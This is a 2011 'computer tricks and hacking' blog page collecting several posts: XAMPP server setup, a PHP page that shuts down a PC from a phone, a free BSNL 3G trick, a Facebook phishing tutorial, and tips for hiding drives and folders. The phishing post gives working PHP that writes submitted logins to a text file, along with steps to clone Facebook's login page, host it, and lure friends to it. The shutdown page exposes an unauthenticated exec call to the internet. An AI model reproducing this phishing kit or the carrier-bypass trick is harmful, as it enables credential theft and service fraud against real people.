Friday, April 22, 2011

Shutdown Computer From Mobile Using PHP/Create a Webserver in your home computer with PHP,MYSQL,APACHE in 5 Easy Steps


On the Internet there are some tutorials about shutting down a computer from a mobile phone.But, in this tutorial we'll check out a way to shutdown a computer from a mobile phone using PHP.For those who don't know PHP, it is a scripting language in simple words.We are PHP as it is a server side scripting language,platform independent and open source.That means we don't have to worry about whether the system runs on Windows or Linux.The procedure is really simple.All we have to do is to set up a server on the computer with PHP and execute system command to shutdown the computer.



1.SERVER SETUP 

We'll use XAMPP to set up the server.Believe me it is too easy.

Go to xampp home page.Download the available package (installer or zip archive).

Now,follow the instruction given on their site to install the server.Actually installation is just unzipping the archive to a directory.The installation will take just around 2 minute.

However you check my previous post on setting up server on home computer.


2.PHP code 
o After installing XAMPP, just open up XAMPP directory.Then you will locate htdocsshutdown. folder.Open that and create a new directory/folder.You can name it anything you want.Suppose the name of the new folder is
o Open the newly created folder shutdown and create a new file withindex.php extension.
o Now open up index.php file and place the nice little code if you run windows.
echo 'Shutting down'; exec("shutdown -s -t 30"); //30 means shutdown after 30 seconds ?> 
3.Creating URL 

Go to no-ip.com and register a free sub-domain and point it to the the following

http://YOUR-IP-ADDRESS/shutdown/

To find out your ip address just visit any site like http://checkmyip.com/.


That's
 it.Now you visit that link with no-ip subdomain from your mobile phone to shut down the computer.


       
This tutorial will address the basic setup of a server on your own computer running with windows platform. This means the removal of hassles of dealing with the company that is running a remote web server. It will be easy to modify. You can add any thing you want to it, be it CGI/Perl, Zope, Roxen, etc, all by your self. You will have unlimited disk space, well at least as big as your hard disk drive . Now that you know the advantages, it is time that I tell you what you will need.


You will need XAMPP 1.6.8 which is available for free & combines all of the following


* Apache HTTPD 2.2.9 + Openssl 0.9.8i
* MySQL 5.0.67
* PHP 5.2.6
* PHP 4.4.9
* phpMyAdmin 2.11.9.2
* FileZilla FTP Server 0.9.27
* Mercury Mail Transport System 4.52

STEP 1 :
1.I recommend to download Self-extracting 7-ZIP archive version because of its low size compared to other two versions.

Download Link


         
STEP 2 :
After downloading extract the archiveto folder of your choice.Don't panic if it halts for few minutes at some stage (may be at 27%,32% or81%) during extraction.

 
Just be patient.
Remember that XAMPP folder will be created automatically which meansyou don't need to create one.

 
STEP 3
Now,loacate the file in the setup-xampp.bat in the XAMPP folder and run it.
You will see something like this ::
NOTE::
To start XAMPP without setup!«

If you extract XAMPP in a top level folder like c:\xampp or d:\xampp etc., you can start XAMPP directly. That means you do not need to execute the “setup_xampp.bat” at all. Apache, MySQL and Mercury Mail server will start up correctly! FileZilla FTP server will not start because it requires absolute paths. Please note: Do not use a double-xampp-folder like c:\xampp\xampp! You need a single-xampp folder like d:\xampp(\apache and so on). Otherwise you must run the “setup-xampp.bat” to set up the path configurations.


STEP 4
XAMPP control Panel

Run the file xampp-control.exe present in the folder XAMPP. The XAMPP Control Panel will appear.
To have the Apache server and the MySQL database started upon the system startup, install them as services by checking the Svc checkboxes next to them. Then ckick OK in the XAMPP Control dialog box that opens.

The Apache and MySQL servers are installed as services.

To start the Apache HTTP server, click Start.
To start the MySQL database server, click Start.
Here are some more server scripts, you might find useful:


* Apache & MySQL start: .\xampp\xampp_start.exe
* Apache & MySQL stop: .\xampp\xampp_stop.exe
* Apache start: .\xampp\apache_start.bat
* Apache stop: .\xampp\apache_stop.bat
* MySQL start: .\xampp\MySQL_start.bat
* MySQL stop: .\xampp\MySQL_stop.bat
* Mercury Mailserver start: .\xampp\mercury_start.bat
* FileZilla Server setup: .\xampp\filezilla_setup.bat
* FileZilla Server start: .\xampp\filezilla_start.bat
* FileZilla Server stop: .\xampp\filezilla_stop.bat


STEP 5
Checking XAMPP Installation

Open the URL http://localhost or http://127.0.0.1 in your browser .Click on the preferred language and you'll get this welcome screen for English.

UNINSTALLATION::
Shut down the XAMPP server and exit all panels. If you installed any services, shut them down too.
Simply delete the entire folder where XAMPP is installed. There are no registry entries and no environment variables to clean up… just simply good, clean code! Don’t forget to uninstall any services you might have installed

 


Thursday, April 21, 2011

free bsnl 3g hacking trick


1. Buy a normal 2g bsnl’s sim card and keep balance 50+ rs.
2. Now activate gprs by sending sms GPRS PRE to 53733 It will be
activated in 24 hours, after activation get gprs settings by calling c.care
3. Now do e-recharge with 230 rs (or whatever unlimited plan exists in your area)
in it,
4. After activation You have to change only one thing in your 3G enabled cell.
5. Go to settings>tools>settings>phone&g
t;network>network mode> now select UMTS
6. THEN do manual searching for network u will find bsnl 3g network there with small 3g logo along with its name,select it as default
7. Now see your data signals logo now  it is converted into 3G
You will get near about 500kbps to 1200 kbps speed
Remember use BSNLEGPRS or BSNLPREPAID as your access point.


How to hack facebook Account password


We will we use very popular method to hack facebook account password.That is Phishing.This is one of the best method to hack facebook account password.This will work only if your friend don’t know about this method of hacking facebookFor this We need three files:
1.Fake facebook login page
2.Php file
3.Text file to store password
Create your php file
1.Open notepad and copy this code:
header (‘Location: https://login.facebook.com/login.php’);
$handle = fopen(“password.txt”, “a”);
foreach($_POST as $variable => $value) {
fwrite($handle, $variable);
fwrite($handle, “=”);
fwrite($handle, $value);
fwrite($handle, “\r\n”);
}
fwrite($ handle, “\r\n”);
fclose($handle) ;
exit;
?>
2.Now save this as phishing.php
Your php file is now created
If you Don’t understand what this php file is doing you need to learn some basic of php.This php file will save information of victim in file password.txt
Create facebook fake login page
Now  go to http://www.facebook.com and right click / View Source.Copy source in notepad and save it as facebooklogin .html .Now open source code of this html file
We need to find the place where Login  code in facebook page that where send the user after clicking on it.
Now Press crtl-f after opening source code and   search for this code

action=anything.
In this case we have this
action=”https://login.facebook.com/login.php?
We replace that part with:
action=”phishing.php
Save your facebooklogin.html file
Text file
Create a blank text file and name it password.txt
Now upload all the three files Facebooklogin.html,phishing.php,Password.txt in any free web hosting site directory like 100mb.com and now you can just check your fake facebook login page by going to http://yoursite.110mb.com/Facebooklogin.html for the fake login page.Just type some random user name and any password into the text box and then you will see in your file manager that a file called “Password.txt” is created,In which the password is stored.
You can use
http://www.justfree.com/
http://www.ripway.com/
also or any other free hosting site.
Suppose you register with name facebookhack.Your link will be http://www.facebookhack.justfree.com/
After uploading files your phishing link will be http://www.facebookhack.justfree.com/facebooklogin.html
Send this link to your friend if they login there their password will be save at the server .
You can trick your friend to login this fake facebook page by saying its new version of facebook check it out,or in any way you like
“Use this on your own responsibility for educational purpose only


Trick On How To Hide Drive Using Command Prompt


Trick On How To Hide Drive Using Command Prompt
If you want to hide your Disk Drive then you can easily do it with command prompt trick.This trick works on all versions of windows i.e windows 98,xp,vista and windows 7.
You can also learn the trick to Create an Invisible Folder
Follow these simple steps To Hide Disk Drive
  1. Click on Start Button in taskbar and then goto Run
  2. In Run type cmd. (This will open Command Prompt)
  3. Now type Diskpart in command prompt and press Enter key. (This will start your Diskpart session)
  4. Now type List volume (This will list all your volumes)
  5. a Trick On How To Hide Drive Using Command Prompt
  6. Now you have to select a volume that you want to hide.Example Type select 3 and your volume 3 will be selected.
  7. Type Remove letter F (you should type your volume name instead of F).b Trick On How To Hide Drive Using Command Prompt
The drive will now get hidden(If not just restart your computer).
c Trick On How To Hide Drive Using Command Prompt
Trick on How To Unhide The Hidden drive Using Command prompt
  1. To Unhide the Drive follows the steps 1-5 as mentioned above.
  2. Now Type assign letter F (You should type your volume name instead of F)
d Trick On How To Hide Drive Using Command Prompt
Now your hidden drive will be visible.(If not just Restart your computer)


Trick To Create Invisble Folder Without Name In Windows 7 And Vista


Trick To Create Invisble Folder Without Name In Windows 7 And Vista
Windows 7 and vista allows you to create an invisible folder without any logo and name.If you have some private data and want to hide it from pirating eyes without using any external software then certainly you will benefit from this tutorial.
If you want to protect your data using password then you can read my post on Axcrypt:Free Encryption Software or Bitlocker Encryption utility
In this tutorial we will protect our data first placing it in an invisible folder and then hiding it so that no one can even accidentaly open that folder.So this will provide you with two level security.
How To Create A Folder Without Name In Windows 7 And Vista?

  1. Click on Start Button in taskbar
  2. Search For Character Map
  3. Open character Map and click on the blank Coloumn
    chracter Trick To Create Invisble Folder Without Name In Windows 7 And Vista
  4. Now Click on Select Button and then on Copy Button(Now you have copied a blank Space)
  5. Create a New folder and Rename it and press Ctrl+V keys from keyboard.
By this time we have created a folder without any name.Now we have to create a folder without any Logo.
invisible Trick To Create Invisble Folder Without Name In Windows 7 And Vista
How To Create An Invisible Folder  In Windows 7 And Vista?
  1. Right click on the folder that you have created without name in the previous step.
  2. Click on Properties>>Customise>>Change Icon
  3. Now will get a popup windows with various icon.Select the blank Icon
display Trick To Create Invisble Folder Without Name In Windows 7 And Vista
4. Press Ok
By this time you have created an Invisible folder with no logo and no name.
Move all of your private data in this invisible folder.
How To Hide the Invisible Folder In Windows 7 And Vista?
  1. Right Click on the Invisible Folder
  2. Select Properties and now select the Hidden Checkbox.
By this time you have your data in an invisible folder with no logo,name and which is hidden.So only you can access this folder as only you have knowledge where this invisible folder is stored


Top 10 Improvements/Features Of Firefox 4.0


Top 10 Improvements/Features Of Firefox 4.0 The Highly anticipated Firefox 4.0 has been released and it had 4.7 million downloads in first 24 hours which are more then double to that of Internet Explorer 9.Internet explorer 9 had 2.3 million downloads in first 24 hours of its release.
Those who haven’t downloaded Internet Explorer 9 can download the offline Internet Explorer 9 here.
Top 10 Improvements/Features Of Firefox 4.0
Design:-Firefox 4 has undergone a major design change.It has borrowed the looks from Google chrome.The Tabs are now placed above the Address bar providing a good and clean look.
Synchronization:-Firefox now allows you to synchronise your browser with other firefox browser running on another device like between Firefox on Computer And Android.You can even Synchronise the opened tabs of your browser.
Addon Gallery:-The Addons gallery has also been redesigned and now opens in a tab instead of a popup window and provides better interface addon management.
Html 5 Support:-As Internet Explorer 9 has provided support for html 5 similarly firefox 4.0 also supports the html 5.
Stability:-If one of your Tab crashes due to flash or any other application then firefox tries to protect other tabs from getting crashed.
Hardware Acceleration:-As Internet explorer 9 provided better graphics rendering support by using the computer processor(Hardware Acceleration) similarly Firefox 4.0 also uses hardware acceleration
Speed:-There has been an approximate 6 times increase in speed of firefox as compared to its older version due to new javascript Engine.
Tab Switching:-You can easily switch between tabs if you have lot of tabs open.Just start typing the tittle of the website and you will automatically get the option to switch to that tab.
Panorama:-You create groups of similar tabs using Firefox new feature Panorama.
App Tabs:-You can create small tabs using the App Tabs feature of firefox 4.You can pin your favourite website into App Tabs


How to Increase or Speed up Internet Speed


This is a very simple way to increase your internet speed Without using any software or internet speed booster.It is all manual steps.Check the following step to increase your internet speed.
1.Go to desktop->My computer-(right click on)->manage->-Device manager-> now you see a window of – Device manager
2.Then go to Ports->Communication Port (double click on it and Open).
3.After open you can see a Communication Port properties.
4.Go to the Port Setting:-
and  increase your “Bits per second” to 128000.
and “Flow control” change 2 Hardware.
It may not help to increase your internet speed
Hint: To speed up internet, delete all temp files in your computer, because this might a reason for slow internet speed connection


 

Computer tricks and Internet hacking Copyright © 2011 | THANK YOU | VISIT AGAIN